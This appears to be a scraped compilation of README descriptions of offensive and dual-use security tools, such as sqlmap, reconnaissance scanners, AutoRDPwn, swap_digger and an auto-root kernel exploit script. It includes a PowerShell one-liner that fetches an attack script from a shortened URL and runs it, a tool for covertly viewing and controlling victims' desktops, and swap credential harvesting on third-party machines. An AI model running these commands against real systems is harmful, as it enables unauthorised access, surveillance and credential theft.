SQLMap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

  • Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix database management systems.
  • Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.
  • Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
  • Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
  • Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
  • Support to dump database tables entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.
  • Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain string like name and pass.
  • Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.
  • Support for database process' user privilege escalation via Metasploit's Meterpreter getsystem command.

You can download the latest tarball by clicking here or latest zipball by clicking here.
Preferably, you can download sqlmap by cloning the Git repository:

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

sqlmap works out of the box with Python version 2.6.x and 2.7.x on any platform.

To get a list of basic options and switches use:

python sqlmap.py -h

To get a list of all options and switches use:

python sqlmap.py -hh

You can find a sample run here. To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the user's manual.




Nameles provides an easy to deploy, scalable IVT detection and filtering solution that is proven to detect at a high level of accuracy ad fraud and other types of invalid traffic such as web scraping.
For a high level overview you might want to check out the website
If you have any questions or need support, try the gitter channel

Getting Started

wget https://raw.githubusercontent.com/Nameles-Org/Nameles/master/setup
chmod +x setup && ./setup

More detailed information related with setup options is provided below.

Detection Capability
While absolute measurement of detection capability is impossible, Nameles is the only detection solution that can be audited by indepedent parties and that is backed by several scientfic papers.
Nameles can detect invalid traffic on:

  • mobile and desktop
  • display, video, and in-app

Detection Method
Nameles implements a highly scalable entropy measurement using Shannon entropy of the IP addresses a given site is receiving traffic from, and then assigns a normalized score to the site based on its traffic pattern.

Entropy have been used widely in finance, intelligence, and other fields where dealing with vast amounts of data and many unknowns characterize the problem. The use of Shannon entropy has been covered in hundreds of scientific papers. Some argue that Shannon received it from Alan Turing himself, and that it was the method Turing used for cracking the Nazi code.

System Overview
Nameles consist of two separate modules

The scoring-module replies to the query messages sent by DSP with the confidence score of the domain and the category in which the domain falls, based on the statistical thresholds of outlierness. In addition, the scoring-module forwards the messages to the data-processing-module for updating the scores at the end of the day. Modules communicate using zeromq.
Figure 1: An example deployment with a DSP

Figure 1 presents a high level representation of Nameles functional blocks. Moreover, the figure shows how Nameles could be integrated in the programmatic ad delivery chain as an auxiliary service for the DSPs. The only difference with respect to the current operation of a DSP would be that, as part of the pre-bid phase, the DSP makes a request to Nameles to provide a Confidence Score per bid request. To this end, the DSP sends a scoring request to Nameles (step 2 in Figure 3). The scoring request includes the following fields: bid request id (mapping Nameles result to the corresponding bid request), IP address of the device associated with the bid event and the domain offering the ad space. This information is included in the bid requests as defined in the openRTB protocol standard. The scoring request is delivered to two independent modules of Nameles: the Scoring module and the Filtering module.

Scoring Module
The scoring-module runs several worker threads that pull the queries from the DSP end and push the reply messages. The workers perform a single lookup in a shared hash table for each message. Therefore, the host running the scoring-module module requires minimal memory and drive. We recommend setting a worker per CPU and running latency tests with your expected throughtput load in order to dimensionate an appropriate number of processors for the host. Note that you can run several scoring modules in your system communicating with the same data processing module.

Data Processing Module
The data-processing-module performs precomputations with the stream of data received from the scoring module. The data is periodically serialized to a PostgreSQL database. The scores are computed at the end of each day. The host of this module would benefit from having a high amount of RAM and a certain number of processors in order to reduce the score computation times. We recommend at least 64GB of RAM and 4 cores.

In the case of a DSP a response to a given bid request has to be received by the Ad Exchange within 100 ms. Hence, the delay introduced by Nameles is limited to few ms in order to minimize the impact in the overall bidding process delay. This ensures that also in Exchange use, the strict requirements for avoiding delays on publisher websites are avoided.
Figure 2: Stress-testing results with Nameles using real data

Figure 2 the performance of Nameles once deployed. The x-axis shows the different tested scoring request rates. The left y-axis and right y-axis show the 95-percentile filtering delay and 95-percentile memory consumption for the different scoring request rates (QPS). The line in the figure represents the average of 95-percentile values across the 5 experiments whereas the lighter color area shows the max and min 95-percentile values.

1. Before Deployment

1.1. System Requirements
You have the option of setting up Nameles on a single machine, or 3 separate machines. For a production system, we recommend:

1.1.1. Operating System
Nameles have been built and tested on Ubuntu / Debian systems.

1.1.2. Single Machine

  • 4 cpu cores
  • 64GB of RAM

1.1.3. Multi Machine
scoring module

  • 2 cpu cores
  • 4GB of RAM

data processing module

  • 4 cpu cores
  • 64GB of RAM

dsp emulator module

  • 4 cpu cores
  • 8GB of RAM

1.2. Depedencies
Depencies will be taken care by the setup script, so you should not have to worry about anything more than running ./setup as shown in the section 2.1. and 2.2. depending on your system configuration. The main depencies are:

  • docker-ce
  • psql

2. Install Nameles
You can install Nameless on a single machine or a cluster of multiple machines following the instructions on section 2.1 below. There are two options:

  • single configuration deployment
  • multiple configuration deployment

If you install Nameles on a multiple machine docker cluster/swarm, then you have two options: a) where you let docker allocate resources per service b) where you allocate reseources yourself.

2.1 Installation with Setup Script
For running Nameles on a single server on an Ubuntu or Debian system:

# download the setup script
wget https://raw.githubusercontent.com/Nameles-Org/Nameles/master/setup

# change the permissions
chmod +x setup

# run the setup script

2.3. Test Installation
You will have to create another shell, as in the shell where you run the setup now you will have a running docker instance.

psql -h -p 5430 -U nameles

NOTE: you need to have installed the postgreSQL client as detailed in section 1.2

3. Using Nameles
The dsp-emulator module can be used as an example for interfacing Nameles from your infrastructure, i.e. message formatting and zeromq port bindings. The latency test source code is implemented in C++ but a different language for which zeromq is available could be used.

3.1. Restarting

3.1.1. Single Configuration Install
If the machine where Nameles is running reboots or is interrupted for another reason, you can restart with:

sudo docker-compose -f ~/Nameles/nameles-docker-compose.yml up

3.1.2. Multiple Configuration Install
Note that after each command you have to start a new shell, as the current shell has a container running in it.

  sudo docker-compose -f ~/Nameles/data-docker-compose.yml up
sudo docker-compose -f ~/Nameles/scoring-docker-compose.yml up
sudo docker-compose -f ~/Nameles/emulator-docker-compose.yml up

Reconnaissance Swiss Army Knife

Main Features

  • Wizard + CLA interface
  • Can extracts targets from STDIN (piped input) and act upon them
  • All the information is extracted with APIs, no direct contact is made to the target



[youtube https://www.youtube.com/watch?v=CHkIMcSzzCY&w=560&h=315]

Recon Dog will run on anything that has a python interpreter installed. However, it has been tested on the following configurations:
Operating Systems: Windows, Linux, Mac
Python Versions: Python2.7, Python 3.6

Recon Dog requires no manual configuration and can be simply run as a normal python script.
However, a debian package can be downloaded from here if you want to install it.


Wizard Interface
Wizard interface is the most straightforward way you can use Recon Dog in. Just run the program, select what you want to do and enter the target, it's that simple.

CLA Interface
Recon Dog also has a Command Line Argument inteface. Here's how you can find subdomains:

python dog -t marvel.com -c 7

There's more to it! Do you have a program that can enumerate subdomains and you want to scan ports of all the subdomains it finds? Don't worry, Recon Dog is designed for handling with such cases. You can simply do this:

subdomainfinder -t example.com | python dog --domains -c 3

Also, it doesn't matter what kind of output the other program generates, Recon Dog uses regular expressions to find targets which makes it easy to integrate will literally every tool. There are two switchs available:

--domains    extract domains from STDIN
--ips extract ip addresses from STDIN

Auto Root Exploit Tool
Author : Nilotpal Biswas
Facebook : https://www.facebook.com/nilotpal.biswas.73
Twitter : https://twitter.com/nilotpalhacker


       for kernel version 2.6 all
bash autoroot.sh 2

for kernel version 3 all
bash autoroot.sh 3

for kernel version 4 all
bash autoroot.sh 4

for freebsd & openbsd all
bash autoroot.sh bsd

for apple macos all
bash autoroot.sh app

for kernel 2.6,3,4 bsd & app all
bash autoroot.sh all

Screenshot 1

Screenshot 2

All exploits are suggested by “exploit-db.com” and will update according to it.

Quasar Is An Information Gathering Framework For Penetration Testers Coded By Belahsan Ouerghi:
  • Website Informations
  • E-mail Address Checker
  • Phone Number Information
  • Credit Card Bin Checker
  • Ip Locator
  • Port Scanner


sudo apt-get install git
git clone https://github.com/TunisianEagles/quasar.git
cd quasar
chmod +x install.sh
chmod +x quasar.sh
sudo ./install.sh
sudo ./quasar.sh


Tested On :

  • Backbox linux
  • Ubuntu


[youtube https://www.youtube.com/watch?v=VuQ6rH6yJtQ&w=560&h=315]


  • Contact – Belahsan Ouerghi
  • Youtube – Tunisian Eagles Youtube Channel

This is a tool to enumerate subdomains using the Certificate Transparency logs stored by Censys. It should return any subdomain who has ever been issued a SSL certificate by a public CA.

See it in action:
$ python censys_subdomain_finder.py github.com

[*] Searching Censys for subdomains of github.com
[*] Found 42 unique subdomains of github.com in ~1.7 seconds

- hq.github.com
- talks.github.com
- cla.github.com
- github.com
- cloud.github.com
- enterprise.github.com
- help.github.com
- collector-cdn.github.com
- central.github.com
- smtp.github.com
- cas.octodemo.github.com
- schrauger.github.com
- jobs.github.com
- classroom.github.com
- dodgeball.github.com
- visualstudio.github.com
- branch.github.com
- www.github.com
- edu.github.com
- education.github.com
- import.github.com
- styleguide.github.com
- community.github.com
- server.github.com
- mac-installer.github.com
- registry.github.com
- f.cloud.github.com
- offer.github.com
- helpnext.github.com
- foo.github.com
- porter.github.com
- id.github.com
- atom-installer.github.com
- review-lab.github.com
- vpn-ca.iad.github.com
- maintainers.github.com
- raw.github.com
- status.github.com
- camo.github.com
- support.enterprise.github.com
- stg.github.com
- rs.github.com


  1. Register an account (free) on https://censys.io/register
  2. Browse to https://censys.io/account, and set two environment variables with your API ID and API secret
$ export CENSYS_API_ID=...
$ export CENSYS_API_SECRET=...
  1. Clone the repository
$ git clone https://github.com/christophetd/censys-subdomain-finder.git
  1. Install the dependencies
$ cd censys-subdomain-finder
$ pip install -r requirements.txt
  1. Run the script on example.com to make sure everything works as expected.
$ python censys_subdomain_finder.py example.com

[*] Searching Censys for subdomains of example.com
[*] Found 5 unique subdomains of example.com

- products.example.com
- www.example.com
- dev.example.com
- example.com
- support.example.com


usage: censys_subdomain_finder.py [-h] [-o OUTPUT_FILE]
[--censys-api-id CENSYS_API_ID]
[--censys-api-secret CENSYS_API_SECRET]

positional arguments:
domain The domain to scan

optional arguments:
-h, --help show this help message and exit
A file to output the list of subdomains to (default:
--censys-api-id CENSYS_API_ID
Censys API ID. Can also be defined using the
CENSYS_API_ID environment variable (default: None)
--censys-api-secret CENSYS_API_SECRET
Censys API secret. Can also be defined using the
CENSYS_API_SECRET environment variable (default: None)

Should run on Python 2.7 and 3.5.

The Censys API has a limit rate of 120 queries per 5 minutes window. Each invocation of this tool makes exactly one API call to Censys.
Feel free to open an issue or to tweet @christophetd for suggestions or remarks.

With this small suite of open source pentesting tools you're able to create an image (.jpg), audio (.mp3) or video (.mp4) file containing your custom metadata or a set of cross-site scripting vectors to test any webservice against possible XSS vulnerabilities when displaying unfiltered meta data.

Installation / Usage
First install docker on your host system.
Now you can simply run the following command:
sudo docker run -p 80:80 --rm lednerb/metadata-attacker
When finished open your favorite browser and switch to the docker ip or http://localhost

AutoRDPwn is a script created in Powershell and designed to automate the Shadow attack on Microsoft Windows computers. This vulnerability allows a remote attacker to view his victim's desktop without his consent, and even control it on request. For its correct operation, it is necessary to comply with the requirements described in the user guide.

Powershell 5.0 or higher


Version 4.0
• Fixed a bug in the scheduled task to remove the user AutoRDPwn
• The Scheluded Task attack has been replaced by Invoke-Command
• It is now possible to choose the language of the application and launch the attack on English versions of Windows
*The rest of the changes can be consulted in the CHANGELOG file

Execution in a line:
powershell -ExecutionPolicy Bypass “cd $ env: TEMP; iwr https://goo.gl/HSkAXP -Outfile AutoRDPwn.ps1;. AutoRDPwn.ps1″
The detailed guide of use can be found at the following link:

Credits and Acknowledgments
Mark Russinovich for his tool PsExec -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
Stas'M Corp. for its RDP tool Wrapper -> https://github.com/stascorp/rdpwrap
Kevin Robertson for his tool Invoke-TheHash -> https://github.com/Kevin-Robertson/Invoke-TheHash
Benjamin Delpy for his tool Mimikatz -> https://github.com/gentilkiwi/mimikatz

This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.
For more information, you can contact through info@darkbyte.net

swap_digger is a bash script used to automate Linux swap analysis for post-exploitation or forensics purpose. It automates swap extraction and searches for Linux user credentials, Web form credentials, Web form emails, HTTP basic authentication, WiFi SSID and keys, etc.

Download and run the tool

On your machine
Use the following commands to download and run the script on your machine:

alice@1nvuln3r4bl3:~$ git clone https://github.com/sevagas/swap_digger.git
alice@1nvuln3r4bl3:~$ cd swap_digger
alice@1nvuln3r4bl3:~$ chmod +x swap_digger.sh
alice@1nvuln3r4bl3:~$ sudo ./swap_digger.sh -vx

On a mounted hard drive
To use swap_digger on a mounted hard drive, do the following:
First, download the script using the following commands:

alice@1nvuln3r4bl3:~$ git clone https://github.com/sevagas/swap_digger.git
alice@1nvuln3r4bl3:~$ cd swap_digger
alice@1nvuln3r4bl3:~$ chmod +x swap_digger.sh

Then, find the target swap file/partition with:

alice@1nvuln3r4bl3:~$ sudo ./swap_digger.sh -S

Finally, analyze the target by running:

alice@1nvuln3r4bl3:~$ sudo ./swap_digger.sh -vx -r path/to/mounted/target/root/fs -s path/to/target/swap/device

On a third party machine
Use the following commands to download and run the script on a third party machine (useful for pentests and CTFs):

alice@1nvuln3r4bl3:~$ wget https://raw.githubusercontent.com/sevagas/swap_digger/master/swap_digger.sh
alice@1nvuln3r4bl3:~$ chmod +x swap_digger.sh
alice@1nvuln3r4bl3:~$ sudo ./swap_digger.sh -vx

Note: Use the -c option to automatically remove the directory created by swap_digger (/tmp/swap_dig).

Simple run
If you only need to recover clear text Linux user passwords, simply run:

alice@1nvuln3r4bl3:~$ sudo ./swap_digger.sh

Available options
All options:

 ./swap_digger.sh [ OPTIONS ]
Options :
-x, --extended Run Extended tests on the target swap to retrieve other interesting data
(web passwords, emails, wifi creds, most accessed urls, etc)
-g, --guessing Try to guess potential passwords based on observations and stats
Warning: This option is not reliable, it may dig more passwords as well as hundreds false positives.
-h, --help Display this help.
-v, --verbose Verbose mode.
-l, --log Log all outputs in a log file (protected inside the generated working directory).
-c, --clean Automatically erase the generated working directory at end of script (will also remove log file)
-r PATH, --root-path=PATH Location of the target file-system root (default value is /)
Change this value for forensic analysis when target is a mounted file system.
This option has to be used along the -s option to indicate path to swap device.
-s PATH, --swap-path=PATH Location of swap device or swap dump to analyse
Use this option for forensic/remote analysis of a swap dump or a mounted external swap partition.
This option should be used with the -r option where at least //etc/shadow exists.
-S, --swap-search Search for all available swap devices (use for forensics).

Relevant resources
Blog posts about swap digging:

Feel free to message on my Twitter account @EmericNasi

Automates some pentesting work via an nmap XML file. As soon as each command finishes it writes its output to the terminal and the files in output-by-service/ and output-by-host/. Runs fast-returning commands first. Please send me protocols/commands/options that you would like to see included.
  • HTTP
    • whatweb
    • EyeWitness with active login attempts
    • light dirb directory bruteforce
  • DNS
    • nmap NSE dns-zone-transfer and dns-recursion
  • MySQL
  • PostgreSQL
    • light patator bruteforce
    • light patator bruteforce
  • SMTP
    • nmap NSE smtp-enum-users and smtp-open-relay
  • SNMP
    • light patador bruteforce
      • snmpcheck (if patador successfully finds a string)
  • SMB
    • enum4linux -a
    • nmap NSE smb-enum-shares, smb-vuln-ms08-067, smb-vuln-ms17-010
  • SIP
    • nmap NSE sip-enum-users and sip-methods
    • svmap
  • RPC
    • showmount -e
  • NTP
    • nmap NSE ntp-monlist
  • FTP
    • light patator bruteforce
  • Telnet
    • light patator bruteforce
  • SSH
    • light patator bruteforce
  • WordPress 4.7
    • XSS content uploading
  • To add:
  • IPMI hash disclosure
  • ike-scan (can't run ike-scans in parallel)


source pm/bin/activate

Read from Nmap XML file
sudo ./pentest-machine -x nmapfile.xml
Perform an Nmap scan with a hostlist then use those results The Nmap scan will do the top 1000 TCP ports and the top 100 UDP ports along with service enumeration It will save as pm-nmap.[xml/nmap/gnmap] in the current working directory
sudo ./pentest-machine -l hostlist.txt
Skip the patator bruteforcing and all SIP and HTTP commands -s parameter can skip both command names as well as protocol names
sudo ./pentest-machine -s patator,sip,http -x nmapfile.xml